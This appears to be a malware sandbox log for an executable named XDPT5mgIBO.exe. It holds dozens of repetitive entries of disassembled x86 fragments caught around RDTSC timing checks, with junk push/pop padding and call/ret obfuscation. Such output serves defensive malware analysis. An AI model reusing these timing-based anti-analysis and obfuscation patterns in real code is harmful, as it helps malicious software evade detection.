                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5DA58 second address: A5DA6E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jno 00007FA3D4C68E56h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jl 00007FA3D4C68E5Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5F9EE second address: A5F9F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5F9F2 second address: A5F9F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5F9F8 second address: A5F9FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5F9FE second address: A5FA0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5FA0C second address: A5FA12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5FA12 second address: A5FA17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A61C55 second address: A61C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A61C59 second address: A61C5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A61C5D second address: A61C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA3D4D82111h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A62BC7 second address: A62BE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA3D4C68E63h 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A62BE7 second address: A62C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007FA3D4D82114h 0x0000000c popad 0x0000000d nop 0x0000000e cld 0x0000000f jl 00007FA3D4D82107h 0x00000015 cmc 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007FA3D4D82108h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 call 00007FA3D4D8210Dh 0x00000037 js 00007FA3D4D8210Ch 0x0000003d sbb ebx, 398C1DA4h 0x00000043 pop edi 0x00000044 push 00000000h 0x00000046 or dword ptr [ebp+1247F98Ch], edi 0x0000004c jmp 00007FA3D4D82113h 0x00000051 push eax 0x00000052 pushad 0x00000053 push esi 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A62C64 second address: A62C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A62C6D second address: A62C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A64C6B second address: A64C6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A64C6F second address: A64CB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FA3D4D82108h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 jnp 00007FA3D4D82106h 0x0000002a push 00000000h 0x0000002c mov ebx, dword ptr [ebp+122D210Ah] 0x00000032 push 00000000h 0x00000034 xor dword ptr [ebp+124502CAh], eax 0x0000003a xchg eax, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A64CB3 second address: A64CB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A64CB9 second address: A64CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A62DF7 second address: A62DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A65B96 second address: A65BA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FA3D4D82106h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A65BA1 second address: A65BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007FA3D4C68E58h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 sbb ebx, 190826C1h 0x00000028 push 00000000h 0x0000002a mov bh, al 0x0000002c push 00000000h 0x0000002e movzx ebx, si 0x00000031 xchg eax, esi 0x00000032 push eax 0x00000033 push edx 0x00000034 jns 00007FA3D4C68E58h 0x0000003a push edx 0x0000003b pop edx 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A65BE2 second address: A65BE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A65BE8 second address: A65BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A65BEC second address: A65BFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A65BFC second address: A65C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A65C01 second address: A65C1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3D4D82115h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A67F44 second address: A67F66 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA3D4C68E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FA3D4C68E60h 0x0000000f popad 0x00000010 push eax 0x00000011 push edi 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A69FAF second address: A69FB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A0CAAD second address: A0CAD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3D4C68E5Eh 0x00000009 jmp 00007FA3D4C68E68h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A0CAD7 second address: A0CAEC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA3D4D82106h 0x00000008 jp 00007FA3D4D82106h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A0952D second address: A0953D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jns 00007FA3D4C68E56h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A0953D second address: A09541 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A09541 second address: A09549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A09549 second address: A09569 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA3D4D8210Ah 0x00000008 jmp 00007FA3D4D82111h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A09569 second address: A09572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A09572 second address: A09576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A7905D second address: A79063 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A79063 second address: A79069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A79069 second address: A790AF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA3D4C68E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d ja 00007FA3D4C68E62h 0x00000013 jmp 00007FA3D4C68E5Ch 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c pushad 0x0000001d pushad 0x0000001e jmp 00007FA3D4C68E5Bh 0x00000023 jl 00007FA3D4C68E56h 0x00000029 popad 0x0000002a jl 00007FA3D4C68E58h 0x00000030 popad 0x00000031 mov eax, dword ptr [eax] 0x00000033 pushad 0x00000034 push edi 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A790AF second address: A790C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jnc 00007FA3D4D82110h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A7C85F second address: A7C86F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA3D4C68E56h 0x00000008 jg 00007FA3D4C68E56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A7C86F second address: A7C898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3D4D82114h 0x00000009 jmp 00007FA3D4D82111h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A7CFF8 second address: A7D020 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA3D4C68E56h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push esi 0x0000000e jmp 00007FA3D4C68E62h 0x00000013 push eax 0x00000014 push edx 0x00000015 jc 00007FA3D4C68E56h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A7D2D1 second address: A7D2E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3D4D82112h 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A7D2E8 second address: A7D301 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E62h 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A7DA3B second address: A7DA41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A7DA41 second address: A7DA45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A7DA45 second address: A7DA68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FA3D4D8211Dh 0x0000000c jmp 00007FA3D4D82117h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A7DA68 second address: A7DA83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FA3D4C68E56h 0x0000000a jmp 00007FA3D4C68E61h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A7DA83 second address: A7DA8D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A7DA8D second address: A7DA91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A8620C second address: A86210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A86210 second address: A86234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ebx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA3D4C68E67h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A86234 second address: A86238 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A84EF0 second address: A84EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A84EF6 second address: A84F1C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA3D4D82106h 0x00000008 jmp 00007FA3D4D82114h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jg 00007FA3D4D82112h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A84F1C second address: A84F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA3D4C68E56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A84F26 second address: A84F34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3D4D8210Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A84F34 second address: A84F5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E5Fh 0x00000007 jl 00007FA3D4C68E56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007FA3D4C68E5Eh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A8522D second address: A85242 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D82111h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A854E7 second address: A854F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A854F1 second address: A85507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pushad 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a jns 00007FA3D4D82106h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A85507 second address: A85516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jc 00007FA3D4C68E5Eh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A85AE6 second address: A85AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A88E3A second address: A88E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A88E43 second address: A88E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA3D4D82106h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A07B2D second address: A07B32 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A8E111 second address: A8E129 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA3D4D82106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop eax 0x0000000e jg 00007FA3D4D8210Eh 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A36A09 second address: A36A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A36A10 second address: A36A2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D82115h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A8F085 second address: A8F097 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA3D4C68E56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A8F097 second address: A8F0B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA3D4D82113h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A8F0B1 second address: A8F0B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A8DA08 second address: A8DA17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A8DA17 second address: A8DA28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FA3D4C68E56h 0x00000009 jno 00007FA3D4C68E56h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A8DA28 second address: A8DA2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A944C3 second address: A944CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FA3D4C68E56h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A9342C second address: A93430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A93430 second address: A93476 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FA3D4C68E64h 0x00000012 jmp 00007FA3D4C68E5Eh 0x00000017 jmp 00007FA3D4C68E5Ah 0x0000001c jg 00007FA3D4C68E56h 0x00000022 popad 0x00000023 pushad 0x00000024 push eax 0x00000025 pop eax 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A93476 second address: A93491 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA3D4D82110h 0x00000008 jg 00007FA3D4D82106h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A93491 second address: A9349F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jnp 00007FA3D4C68E56h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: A5701D second address: A35EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FA3D4D82116h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FA3D4D82108h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 mov ecx, dword ptr [ebp+122D355Fh] 0x0000002e call 00007FA3D4D8210Fh 0x00000033 call 00007FA3D4D8210Dh 0x00000038 mov dword ptr [ebp+122D36CCh], ecx 0x0000003e pop edi 0x0000003f pop ecx 0x00000040 lea eax, dword ptr [ebp+12488E64h] 0x00000046 mov edx, dword ptr [ebp+122D2284h] 0x0000004c push eax 0x0000004d jmp 00007FA3D4D82114h 0x00000052 mov dword ptr [esp], eax 0x00000055 push 00000000h 0x00000057 push ebx 0x00000058 call 00007FA3D4D82108h 0x0000005d pop ebx 0x0000005e mov dword ptr [esp+04h], ebx 0x00000062 add dword ptr [esp+04h], 0000001Bh 0x0000006a inc ebx 0x0000006b push ebx 0x0000006c ret 0x0000006d pop ebx 0x0000006e ret 0x0000006f call dword ptr [ebp+122D38D1h] 0x00000075 push ecx 0x00000076 push eax 0x00000077 push edx 0x00000078 push edx 0x00000079 pop edx 0x0000007a rdtsc
